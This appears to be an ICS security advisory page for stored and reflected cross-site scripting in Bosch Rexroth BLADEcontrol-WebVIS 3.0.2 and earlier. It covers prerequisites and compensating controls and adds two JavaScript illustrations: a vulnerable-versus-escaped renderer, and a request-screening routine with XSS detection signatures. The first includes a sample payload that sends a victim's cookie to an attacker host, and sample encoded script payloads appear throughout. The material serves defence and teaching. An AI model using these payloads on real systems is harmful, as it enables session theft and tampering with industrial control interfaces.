OTPulse

Rexroth Bosch BLADEcontrol-WebVIS Vulnerabilities

Monitor · 6.4 · ICS-CERT ICSA-16-187-01 · Apr 8, 2016
Attack Vector: Network
Auth Required: Low (a valid user account)
Complexity: Low
User Interaction: Required (a victim must view the page carrying the payload)
Summary

BLADEcontrol-WebVIS versions 3.0.2 and earlier contain cross-site scripting (XSS) vulnerabilities (CWE-79, in both stored and reflected form) in the web interface. An authenticated attacker can inject JavaScript or HTML through input fields whose content is placed into pages without validation or output encoding. When other users open the affected pages, the injected code runs in their browsers with their session, allowing the attacker to steal session cookies or act as the victim, alter the process data and control parameters the page displays, or redirect users to attacker-controlled content.

What this means
What could happen
An attacker with valid login credentials could inject malicious code into the BLADEcontrol-WebVIS interface, affecting other users viewing the same web pages or potentially altering displayed process data and control parameters.
Who's at risk
Bosch Rexroth BLADEcontrol-WebVIS users, particularly operators and engineers who use the web-based interface to monitor or control industrial equipment. Any facility running BLADEcontrol-WebVIS version 3.0.2 or earlier for remote monitoring or control is affected.
How it could be exploited
An authenticated user accesses the BLADEcontrol-WebVIS web interface and injects JavaScript or HTML code through an unvalidated input field. When other users view the affected page, the malicious code executes in their browsers, allowing the attacker to steal session tokens, modify displayed setpoints, or redirect users to malicious sites.
Prerequisites
  • Valid login credentials for BLADEcontrol-WebVIS
  • Network access to the web interface (typically port 80/443)
  • Another user must view the page containing the injected payload
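The exploitation path above comes down to one defect: field content and request parameters are written into the page as raw HTML. The following is an added illustration, not BLADEcontrol-WebVIS code; the "setpoint label" field, the page layout, the attacker host and the function names are all assumed for the demonstration. It renders the same page once without and once with output encoding, so the stored and the reflected payload can be seen surviving the first and being neutralized by the second.

```javascript
// Added illustration of the defect class the advisory describes (stored and
// reflected XSS from unescaped interpolation). This is not BLADEcontrol-WebVIS
// code: the "setpoint label" field, the page layout and the function names are
// assumed for the demonstration.

// Stand-in for the server-side store behind one HMI page (constructed data).
const store = { setpointLabel: "Pump 1 pressure" };

// Vulnerable rendering: a stored field and a URL parameter are concatenated
// straight into HTML, so any markup in them becomes part of the page.
function renderUnsafe(searchTerm) {
  return "<h1>WebVIS</h1>" +
    "<div class=\"setpoint\">" + store.setpointLabel + "</div>" +     // stored path
    "<div class=\"search\">Results for: " + searchTerm + "</div>";   // reflected path
}

// The missing control: entity-encode untrusted text for the HTML text-node
// context before it is placed in the page.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", "\"": "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

function renderSafe(searchTerm) {
  return "<h1>WebVIS</h1>" +
    "<div class=\"setpoint\">" + escapeHtml(store.setpointLabel) + "</div>" +
    "<div class=\"search\">Results for: " + escapeHtml(searchTerm) + "</div>";
}

// An authenticated attacker saves a payload into the field (stored XSS). The
// payload sends the victim's cookie to an assumed attacker host.
const STORED_PAYLOAD =
  "<img src=x onerror=\"fetch('http://attacker.example/?c='+document.cookie)\">";
function injectStoredPayload() { store.setpointLabel = STORED_PAYLOAD; }

// A reflected payload arrives in the request and is echoed back to whoever
// follows the crafted link.
const REFLECTED_PAYLOAD = "<script>alert(document.domain)</script>";

// Crude check of whether rendered output still carries live markup from the
// payloads: an unescaped <img ... onerror> or <script> element.
function hasLiveMarkup(html) {
  return /<img\b[^>]*\bonerror\s*=/i.test(html) || /<script\b/i.test(html);
}

injectStoredPayload();
console.log("unsafe:", hasLiveMarkup(renderUnsafe(REFLECTED_PAYLOAD)));  // true
console.log("safe:  ", hasLiveMarkup(renderSafe(REFLECTED_PAYLOAD)));    // false
```

Because the product is end of life, the encoding fix shown in renderSafe is not something an operator can apply to WebVIS itself; it is the reason the remaining controls are network restriction, a fronting filter and monitoring rather than a patch.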
Tags: Remotely exploitable · Requires valid credentials · No patch available · Stored and reflected cross-site scripting (XSS) · Can affect multiple users viewing the interface
Exploitability
Low exploit probability (EPSS 0.5%)
Affected products (1)
Product             | Affected Versions | Fix Status
BLADEcontrol-WebVIS | ≤ 3.0.2           | No fix (EOL)
Remediation & Mitigation
Do now
HARDENING: Restrict network access to the BLADEcontrol-WebVIS web interface to authorized engineering and operations personnel only, using firewall rules or network segmentation
WORKAROUND: Disable or restrict access to BLADEcontrol-WebVIS if it is not actively needed for operations
HARDENING: Enforce strong password policies for all BLADEcontrol-WebVIS accounts, and require multi-factor authentication at the access gateway (VPN or jump host) in front of the interface, since an end-of-life product cannot be expected to support it natively
Schedule — requires maintenance window

No vendor patch exists for this end-of-life product; the scheduled item below is a change in front of the interface that may briefly interrupt operator access, so plan it for a maintenance window.

WORKAROUND: Implement web application firewall (WAF) rules to block or sanitize suspicious input patterns sent to BLADEcontrol-WebVIS. Signature rules of this kind can be evaded by encoding or by less common payloads, so treat hits as alerts and keep the network restrictions in place rather than relying on the WAF as a fix.
Mitigations - no patch available
BLADEcontrol-WebVIS ≤ 3.0.2 has reached end of life. The vendor will not release a patch. Apply the following compensating controls:
HARDENING: Monitor user access logs and alert on suspicious authentication patterns and on requests carrying markup in form fields or query parameters
HARDENING: Evaluate migration to a supported or alternative control interface solution
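The WAF workaround and the log-monitoring control above both depend on recognizing XSS carriers in request parameters after undoing the encodings attackers use to hide them. The following is an added example of that screening logic, not vendor code and not a substitute for output encoding; the parameter names and the sample requests are constructed. It percent-decodes repeatedly (catching double encoding), folds HTML entities, then matches a small signature set, returning the hits so they can feed an alert or a block decision.

```javascript
// Added example of request screening for XSS carriers, as a WAF rule or a log
// review job would do it. Not BLADEcontrol-WebVIS code; parameter names and
// sample traffic are constructed. A miss here does not mean a request is safe.

// Signatures for the common carriers of stored/reflected XSS payloads.
const XSS_SIGNATURES = [
  { name: "script-tag",    re: /<\s*script\b/i },
  { name: "event-handler", re: /<[^>]*\son[a-z]+\s*=/i },
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "iframe-object", re: /<\s*(iframe|object|embed)\b/i },
  { name: "svg-math",      re: /<\s*(svg|math)\b/i },
];

// Undo the encodings used to slip past naive filters: bounded repeated
// percent-decoding, then HTML numeric and named entities, then NUL stripping.
function normalize(value) {
  let s = String(value);
  for (let i = 0; i < 3; i++) {             // bounded so a decode loop cannot stall
    let decoded;
    try { decoded = decodeURIComponent(s.replace(/\+/g, " ")); } catch (e) { break; }
    if (decoded === s) break;
    s = decoded;
  }
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
       .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
       .replace(/&lt;/gi, "<").replace(/&gt;/gi, ">")
       .replace(/&quot;/gi, "\"").replace(/&amp;/gi, "&");
  return s.replace(/\0/g, "");
}

// Inspect every parameter of one request; return the list of signature hits.
function inspectRequest(req) {
  const hits = [];
  for (const [param, raw] of Object.entries(req.params)) {
    const value = normalize(raw);
    for (const sig of XSS_SIGNATURES) {
      if (sig.re.test(value)) hits.push({ param, signature: sig.name });
    }
  }
  return hits;
}

// Constructed sample requests (not real WebVIS traffic).
const SAMPLE_REQUESTS = [
  { id: 1, path: "/setpoint", params: { label: "Pump 1 pressure" } },
  { id: 2, path: "/setpoint", params: { label: "<img src=x onerror=\"alert(document.cookie)\">" } },
  { id: 3, path: "/search",   params: { q: "%3Cscript%3Ealert(1)%3C%2Fscript%3E" } },
  { id: 4, path: "/search",   params: { q: "%253Cscript%253Ealert(1)%253C%252Fscript%253E" } }, // double-encoded
  { id: 5, path: "/link",     params: { url: "JaVaScRiPt:alert(1)" } },
];

// Screen a batch and keep only the requests that produced at least one hit.
function screen(requests) {
  return requests
    .map(r => ({ id: r.id, path: r.path, hits: inspectRequest(r) }))
    .filter(r => r.hits.length > 0);
}

console.log(JSON.stringify(screen(SAMPLE_REQUESTS), null, 2));
```

Run against the sample batch, only request 1 passes; requests 2 to 5 are flagged with the signature that matched, including the double-encoded script tag in request 4 that a single decode would have missed. Filters of this shape are still bypassable (attribute-less contexts, unusual tags, browser quirks), which is why the page lists the WAF as a workaround and not a fix.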
API: /api/v1/advisories/5b9cf02b-f722-4e6b-a72d-ae9610073eb1